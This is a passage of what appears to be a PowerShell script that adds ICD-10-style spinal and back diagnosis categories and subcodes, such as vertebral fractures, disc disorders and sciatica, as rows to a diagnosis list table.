$DiagnosisList.Rows.Add("Ankylosing hyperostosis [Forestier]","Ankylosing hyperostosis [Forestier], lumbar region") + $null = $DiagnosisList.Rows.Add("Ankylosing hyperostosis [Forestier]","Ankylosing hyperostosis [Forestier], lumbosacral region") + $null = $DiagnosisList.Rows.Add("Ankylosing hyperostosis [Forestier]","Ankylosing hyperostosis [Forestier], sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Ankylosing hyperostosis [Forestier]","Ankylosing hyperostosis [Forestier], multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Kissing spine","Kissing spine, site unspecified") + $null = $DiagnosisList.Rows.Add("Kissing spine","Kissing spine, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Kissing spine","Kissing spine, cervical region") + $null = $DiagnosisList.Rows.Add("Kissing spine","Kissing spine, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Kissing spine","Kissing spine, thoracic region") + $null = $DiagnosisList.Rows.Add("Kissing spine","Kissing spine, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Kissing spine","Kissing spine, lumbar region") + $null = $DiagnosisList.Rows.Add("Kissing spine","Kissing spine, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Traumatic spondylopathy","Traumatic spondylopathy, site unspecified") + $null = $DiagnosisList.Rows.Add("Traumatic spondylopathy","Traumatic spondylopathy, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Traumatic spondylopathy","Traumatic spondylopathy, cervical region") + $null = $DiagnosisList.Rows.Add("Traumatic spondylopathy","Traumatic spondylopathy, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Traumatic spondylopathy","Traumatic spondylopathy, thoracic region") + $null = $DiagnosisList.Rows.Add("Traumatic spondylopathy","Traumatic spondylopathy, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Traumatic spondylopathy","Traumatic spondylopathy, lumbar region") + $null = $DiagnosisList.Rows.Add("Traumatic spondylopathy","Traumatic spondylopathy, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Traumatic spondylopathy","Traumatic spondylopathy, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, site unspecified","Fatigue fracture of vertebra, site unspecified, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, site unspecified","Fatigue fracture of vertebra, site unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, site unspecified","Fatigue fracture of vertebra, site unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, site unspecified","Fatigue fracture of vertebra, site unspecified, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, occipito-atlanto-axial region","Fatigue fracture of vertebra, occipito-atlanto-axial region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, occipito-atlanto-axial region","Fatigue fracture of vertebra, occipito-atlanto-axial region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, occipito-atlanto-axial region","Fatigue fracture of vertebra, occipito-atlanto-axial region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, occipito-atlanto-axial region","Fatigue fracture of vertebra, occipito-atlanto-axial region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, cervical region","Fatigue fracture of vertebra, cervical region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, cervical region","Fatigue fracture of vertebra, cervical region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, cervical region","Fatigue fracture of vertebra, cervical region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, cervical region","Fatigue fracture of vertebra, cervical region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, cervicothoracic region","Fatigue fracture of vertebra, cervicothoracic region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, cervicothoracic region","Fatigue fracture of vertebra, cervicothoracic region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, cervicothoracic region","Fatigue fracture of vertebra, cervicothoracic region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, cervicothoracic region","Fatigue fracture of vertebra, cervicothoracic region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, thoracic region","Fatigue fracture of vertebra, thoracic region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, thoracic region","Fatigue fracture of vertebra, thoracic region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, thoracic region","Fatigue fracture of vertebra, thoracic region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, thoracic region","Fatigue fracture of vertebra, thoracic region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, thoracolumbar region","Fatigue fracture of vertebra, thoracolumbar region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, thoracolumbar region","Fatigue fracture of vertebra, thoracolumbar region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, thoracolumbar region","Fatigue fracture of vertebra, thoracolumbar region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, thoracolumbar region","Fatigue fracture of vertebra, thoracolumbar region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, lumbar region","Fatigue fracture of vertebra, lumbar region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, lumbar region","Fatigue fracture of vertebra, lumbar region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, lumbar region","Fatigue fracture of vertebra, lumbar region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, lumbar region","Fatigue fracture of vertebra, lumbar region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, lumbosacral region","Fatigue fracture of vertebra, lumbosacral region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, lumbosacral region","Fatigue fracture of vertebra, lumbosacral region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, lumbosacral region","Fatigue fracture of vertebra, lumbosacral region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, lumbosacral region","Fatigue fracture of vertebra, lumbosacral region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, sacral and sacrococcygeal region","Fatigue fracture of vertebra, sacral and sacrococcygeal region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, sacral and sacrococcygeal region","Fatigue fracture of vertebra, sacral and sacrococcygeal region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, sacral and sacrococcygeal region","Fatigue fracture of vertebra, sacral and sacrococcygeal region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fatigue fracture of vertebra, sacral and sacrococcygeal region","Fatigue fracture of vertebra, sacral and sacrococcygeal region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, site unspecified","Collapsed vertebra, not elsewhere classified, site unspecified, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, site unspecified","Collapsed vertebra, not elsewhere classified, site unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, site unspecified","Collapsed vertebra, not elsewhere classified, site unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, site unspecified","Collapsed vertebra, not elsewhere classified, site unspecified, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, occipito-atlanto-axial region","Collapsed vertebra, not elsewhere classified, occipito-atlanto-axial region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, occipito-atlanto-axial region","Collapsed vertebra, not elsewhere classified, occipito-atlanto-axial region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, occipito-atlanto-axial region","Collapsed vertebra, not elsewhere classified, occipito-atlanto-axial region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, occipito-atlanto-axial region","Collapsed vertebra, not elsewhere classified, occipito-atlanto-axial region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, cervical region","Collapsed vertebra, not elsewhere classified, cervical region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, cervical region","Collapsed vertebra, not elsewhere classified, cervical region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, cervical region","Collapsed vertebra, not elsewhere classified, cervical region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, cervical region","Collapsed vertebra, not elsewhere classified, cervical region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, cervicothoracic region","Collapsed vertebra, not elsewhere classified, cervicothoracic region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, cervicothoracic region","Collapsed vertebra, not elsewhere classified, cervicothoracic region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, cervicothoracic region","Collapsed vertebra, not elsewhere classified, cervicothoracic region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, cervicothoracic region","Collapsed vertebra, not elsewhere classified, cervicothoracic region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, thoracic region","Collapsed vertebra, not elsewhere classified, thoracic region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, thoracic region","Collapsed vertebra, not elsewhere classified, thoracic region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, thoracic region","Collapsed vertebra, not elsewhere classified, thoracic region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, thoracic region","Collapsed vertebra, not elsewhere classified, thoracic region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, thoracolumbar region","Collapsed vertebra, not elsewhere classified, thoracolumbar region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, thoracolumbar region","Collapsed vertebra, not elsewhere classified, thoracolumbar region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, thoracolumbar region","Collapsed vertebra, not elsewhere classified, thoracolumbar region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, thoracolumbar region","Collapsed vertebra, not elsewhere classified, thoracolumbar region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, lumbar region","Collapsed vertebra, not elsewhere classified, lumbar region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, lumbar region","Collapsed vertebra, not elsewhere classified, lumbar region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, lumbar region","Collapsed vertebra, not elsewhere classified, lumbar region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, lumbar region","Collapsed vertebra, not elsewhere classified, lumbar region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, lumbosacral region","Collapsed vertebra, not elsewhere classified, lumbosacral region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, lumbosacral region","Collapsed vertebra, not elsewhere classified, lumbosacral region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, lumbosacral region","Collapsed vertebra, not elsewhere classified, lumbosacral region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, lumbosacral region","Collapsed vertebra, not elsewhere classified, lumbosacral region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, sacral and sacrococcygeal region","Collapsed vertebra, not elsewhere classified, sacral and sacrococcygeal region, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, sacral and sacrococcygeal region","Collapsed vertebra, not elsewhere classified, sacral and sacrococcygeal region, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, sacral and sacrococcygeal region","Collapsed vertebra, not elsewhere classified, sacral and sacrococcygeal region, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Collapsed vertebra, not elsewhere classified, sacral and sacrococcygeal region","Collapsed vertebra, not elsewhere classified, sacral and sacrococcygeal region, sequela of fracture") + $null = $DiagnosisList.Rows.Add("Other specified spondylopathies","Other specified spondylopathies, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Other specified spondylopathies","Other specified spondylopathies, cervical region") + $null = $DiagnosisList.Rows.Add("Other specified spondylopathies","Other specified spondylopathies, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other specified spondylopathies","Other specified spondylopathies, thoracic region") + $null = $DiagnosisList.Rows.Add("Other specified spondylopathies","Other specified spondylopathies, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other specified spondylopathies","Other specified spondylopathies, lumbar region") + $null = $DiagnosisList.Rows.Add("Other specified spondylopathies","Other specified spondylopathies, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other specified spondylopathies","Other specified spondylopathies, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Other specified spondylopathies","Other specified spondylopathies, site unspecified") + $null = $DiagnosisList.Rows.Add("Spondylopathy, unspecified","Spondylopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Spondylopathy in diseases classified elsewhere","Spondylopathy in diseases classified elsewhere, site unspecified") + $null = $DiagnosisList.Rows.Add("Spondylopathy in diseases classified elsewhere","Spondylopathy in diseases classified elsewhere, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Spondylopathy in diseases classified elsewhere","Spondylopathy in diseases classified elsewhere, cervical region") + $null = $DiagnosisList.Rows.Add("Spondylopathy in diseases classified elsewhere","Spondylopathy in diseases classified elsewhere, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Spondylopathy in diseases classified elsewhere","Spondylopathy in diseases classified elsewhere, thoracic region") + $null = $DiagnosisList.Rows.Add("Spondylopathy in diseases classified elsewhere","Spondylopathy in diseases classified elsewhere, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Spondylopathy in diseases classified elsewhere","Spondylopathy in diseases classified elsewhere, lumbar region") + $null = $DiagnosisList.Rows.Add("Spondylopathy in diseases classified elsewhere","Spondylopathy in diseases classified elsewhere, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Spondylopathy in diseases classified elsewhere","Spondylopathy in diseases classified elsewhere, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Spondylopathy in diseases classified elsewhere","Spondylopathy in diseases classified elsewhere, multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with myelopathy","Cervical disc disorder with myelopathy, unspecified cervical region") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with myelopathy","Cervical disc disorder with myelopathy, high cervical region") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with myelopathy, mid-cervical region","Cervical disc disorder with myelopathy, mid-cervical region, unspecified level") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with myelopathy, mid-cervical region","Cervical disc disorder at C4-C5 level with myelopathy") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with myelopathy, mid-cervical region","Cervical disc disorder at C5-C6 level with myelopathy") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with myelopathy, mid-cervical region","Cervical disc disorder at C6-C7 level with myelopathy") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with myelopathy, cervicothoracic region","Cervical disc disorder with myelopathy, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with radiculopathy","Cervical disc disorder with radiculopathy, unspecified cervical region") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with radiculopathy","Cervical disc disorder with radiculopathy, high cervical region") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with radiculopathy, mid-cervical region","Mid-cervical disc disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with radiculopathy, mid-cervical region","Cervical disc disorder at C4-C5 level with radiculopathy") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with radiculopathy, mid-cervical region","Cervical disc disorder at C5-C6 level with radiculopathy") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with radiculopathy, mid-cervical region","Cervical disc disorder at C6-C7 level with radiculopathy") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder with radiculopathy, cervicothoracic region","Cervical disc disorder with radiculopathy, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other cervical disc displacement","Other cervical disc displacement, unspecified cervical region") + $null = $DiagnosisList.Rows.Add("Other cervical disc displacement","Other cervical disc displacement, high cervical region") + $null = $DiagnosisList.Rows.Add("Other cervical disc displacement, mid-cervical region","Other cervical disc displacement, mid-cervical region, unspecified level") + $null = $DiagnosisList.Rows.Add("Other cervical disc displacement, mid-cervical region","Other cervical disc displacement at C4-C5 level") + $null = $DiagnosisList.Rows.Add("Other cervical disc displacement, mid-cervical region","Other cervical disc displacement at C5-C6 level") + $null = $DiagnosisList.Rows.Add("Other cervical disc displacement, mid-cervical region","Other cervical disc displacement at C6-C7 level") + $null = $DiagnosisList.Rows.Add("Other cervical disc displacement, cervicothoracic region","Other cervical disc displacement, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other cervical disc degeneration","Other cervical disc degeneration, unspecified cervical region") + $null = $DiagnosisList.Rows.Add("Other cervical disc degeneration","Other cervical disc degeneration, high cervical region") + $null = $DiagnosisList.Rows.Add("Other cervical disc degeneration, mid-cervical region","Other cervical disc degeneration, mid-cervical region, unspecified level") + $null = $DiagnosisList.Rows.Add("Other cervical disc degeneration, mid-cervical region","Other cervical disc degeneration at C4-C5 level") + $null = $DiagnosisList.Rows.Add("Other cervical disc degeneration, mid-cervical region","Other cervical disc degeneration at C5-C6 level") + $null = $DiagnosisList.Rows.Add("Other cervical disc degeneration, mid-cervical region","Other cervical disc degeneration at C6-C7 level") + $null = $DiagnosisList.Rows.Add("Other cervical disc degeneration, cervicothoracic region","Other cervical disc degeneration, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other cervical disc disorders","Other cervical disc disorders, unspecified cervical region") + $null = $DiagnosisList.Rows.Add("Other cervical disc disorders","Other cervical disc disorders, high cervical region") + $null = $DiagnosisList.Rows.Add("Other cervical disc disorders, mid-cervical region","Other cervical disc disorders, mid-cervical region, unspecified level") + $null = $DiagnosisList.Rows.Add("Other cervical disc disorders, mid-cervical region","Other cervical disc disorders at C4-C5 level") + $null = $DiagnosisList.Rows.Add("Other cervical disc disorders, mid-cervical region","Other cervical disc disorders at C5-C6 level") + $null = $DiagnosisList.Rows.Add("Other cervical disc disorders, mid-cervical region","Other cervical disc disorders at C6-C7 level") + $null = $DiagnosisList.Rows.Add("Other cervical disc disorders, cervicothoracic region","Other cervical disc disorders, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder, unspecified","Cervical disc disorder, unspecified, unspecified cervical region") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder, unspecified","Cervical disc disorder, unspecified, high cervical region") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder, unspecified, mid-cervical region","Unspecified cervical disc disorder, mid-cervical region, unspecified level") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder, unspecified, mid-cervical region","Unspecified cervical disc disorder at C4-C5 level") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder, unspecified, mid-cervical region","Unspecified cervical disc disorder at C5-C6 level") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder, unspecified, mid-cervical region","Unspecified cervical disc disorder at C6-C7 level") + $null = $DiagnosisList.Rows.Add("Cervical disc disorder, unspecified, cervicothoracic region","Cervical disc disorder, unspecified, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Thoracic, thoracolumbar and lumbosacral intervertebral disc disorders with myelopathy","Intervertebral disc disorders with myelopathy, thoracic region") + $null = $DiagnosisList.Rows.Add("Thoracic, thoracolumbar and lumbosacral intervertebral disc disorders with myelopathy","Intervertebral disc disorders with myelopathy, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Thoracic, thoracolumbar and lumbosacral intervertebral disc disorders with myelopathy","Intervertebral disc disorders with myelopathy, lumbar region") + $null = $DiagnosisList.Rows.Add("Thoracic, thoracolumbar and lumbosacral intervertebral disc disorders with radiculopathy","Intervertebral disc disorders with radiculopathy, thoracic region") + $null = $DiagnosisList.Rows.Add("Thoracic, thoracolumbar and lumbosacral intervertebral disc disorders with radiculopathy","Intervertebral disc disorders with radiculopathy, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Thoracic, thoracolumbar and lumbosacral intervertebral disc disorders with radiculopathy","Intervertebral disc disorders with radiculopathy, lumbar region") + $null = $DiagnosisList.Rows.Add("Thoracic, thoracolumbar and lumbosacral intervertebral disc disorders with radiculopathy","Intervertebral disc disorders with radiculopathy, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc displacement","Other intervertebral disc displacement, thoracic region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc displacement","Other intervertebral disc displacement, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc displacement","Other intervertebral disc displacement, lumbar region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc displacement","Other intervertebral disc displacement, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc degeneration","Other intervertebral disc degeneration, thoracic region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc degeneration","Other intervertebral disc degeneration, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc degeneration","Other intervertebral disc degeneration, lumbar region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc degeneration","Other intervertebral disc degeneration, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Schmorl's nodes","Schmorl's nodes, thoracic region") + $null = $DiagnosisList.Rows.Add("Schmorl's nodes","Schmorl's nodes, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Schmorl's nodes","Schmorl's nodes, lumbar region") + $null = $DiagnosisList.Rows.Add("Schmorl's nodes","Schmorl's nodes, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc disorders","Other intervertebral disc disorders, thoracic region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc disorders","Other intervertebral disc disorders, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc disorders","Other intervertebral disc disorders, lumbar region") + $null = $DiagnosisList.Rows.Add("Other thoracic, thoracolumbar and lumbosacral intervertebral disc disorders","Other intervertebral disc disorders, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Unspecified thoracic, thoracolumbar and lumbosacral intervertebral disc disorder","Unspecified thoracic, thoracolumbar and lumbosacral intervertebral disc disorder") + $null = $DiagnosisList.Rows.Add("Other and unspecified dorsopathies, not elsewhere classified","Cervicocranial syndrome") + $null = $DiagnosisList.Rows.Add("Other and unspecified dorsopathies, not elsewhere classified","Cervicobrachial syndrome") + $null = $DiagnosisList.Rows.Add("Spinal instabilities","Spinal instabilities, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Spinal instabilities","Spinal instabilities, cervical region") + $null = $DiagnosisList.Rows.Add("Spinal instabilities","Spinal instabilities, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Spinal instabilities","Spinal instabilities, thoracic region") + $null = $DiagnosisList.Rows.Add("Spinal instabilities","Spinal instabilities, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Spinal instabilities","Spinal instabilities, lumbar region") + $null = $DiagnosisList.Rows.Add("Spinal instabilities","Spinal instabilities, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Spinal instabilities","Spinal instabilities, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Spinal instabilities","Spinal instabilities, site unspecified") + $null = $DiagnosisList.Rows.Add("Sacrococcygeal disorders, not elsewhere classified","Sacrococcygeal disorders, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specified dorsopathies","Other specified dorsopathies, site unspecified") + $null = $DiagnosisList.Rows.Add("Other specified dorsopathies","Other specified dorsopathies, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Other specified dorsopathies","Other specified dorsopathies, cervical region") + $null = $DiagnosisList.Rows.Add("Other specified dorsopathies","Other specified dorsopathies, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other specified dorsopathies","Other specified dorsopathies, thoracic region") + $null = $DiagnosisList.Rows.Add("Other specified dorsopathies","Other specified dorsopathies, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other specified dorsopathies","Other specified dorsopathies, lumbar region") + $null = $DiagnosisList.Rows.Add("Other specified dorsopathies","Other specified dorsopathies, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other specified dorsopathies","Other specified dorsopathies, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Dorsopathy, unspecified","Dorsopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Panniculitis affecting regions of neck and back","Panniculitis affecting regions of neck and back, site unspecified") + $null = $DiagnosisList.Rows.Add("Panniculitis affecting regions of neck and back","Panniculitis affecting regions of neck and back, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Panniculitis affecting regions of neck and back","Panniculitis affecting regions of neck and back, cervical region") + $null = $DiagnosisList.Rows.Add("Panniculitis affecting regions of neck and back","Panniculitis affecting regions of neck and back, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Panniculitis affecting regions of neck and back","Panniculitis affecting regions of neck and back, thoracic region") + $null = $DiagnosisList.Rows.Add("Panniculitis affecting regions of neck and back","Panniculitis affecting regions of neck and back, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Panniculitis affecting regions of neck and back","Panniculitis affecting regions of neck and back, lumbar region") + $null = $DiagnosisList.Rows.Add("Panniculitis affecting regions of neck and back","Panniculitis affecting regions of neck and back, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Panniculitis affecting regions of neck and back","Panniculitis affecting regions of neck and back, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Panniculitis affecting regions of neck and back","Panniculitis affecting regions, neck and back, multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Radiculopathy","Radiculopathy, site unspecified") + $null = $DiagnosisList.Rows.Add("Radiculopathy","Radiculopathy, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Radiculopathy","Radiculopathy, cervical region") + $null = $DiagnosisList.Rows.Add("Radiculopathy","Radiculopathy, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Radiculopathy","Radiculopathy, thoracic region") + $null = $DiagnosisList.Rows.Add("Radiculopathy","Radiculopathy, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Radiculopathy","Radiculopathy, lumbar region") + $null = $DiagnosisList.Rows.Add("Radiculopathy","Radiculopathy, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Radiculopathy","Radiculopathy, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Cervicalgia","Cervicalgia") + $null = $DiagnosisList.Rows.Add("Sciatica","Sciatica, unspecified side") + $null = $DiagnosisList.Rows.Add("Sciatica","Sciatica, right side") + $null = $DiagnosisList.Rows.Add("Sciatica","Sciatica, left side") + $null = $DiagnosisList.Rows.Add("Lumbago with sciatica","Lumbago with sciatica, unspecified side") + $null = $DiagnosisList.Rows.Add("Lumbago with sciatica","Lumbago with sciatica, right side") + $null = $DiagnosisList.Rows.Add("Lumbago with sciatica","Lumbago with sciatica, left side") + $null = $DiagnosisList.Rows.Add("Low back pain","Low back pain") + $null = $DiagnosisList.Rows.Add("Pain 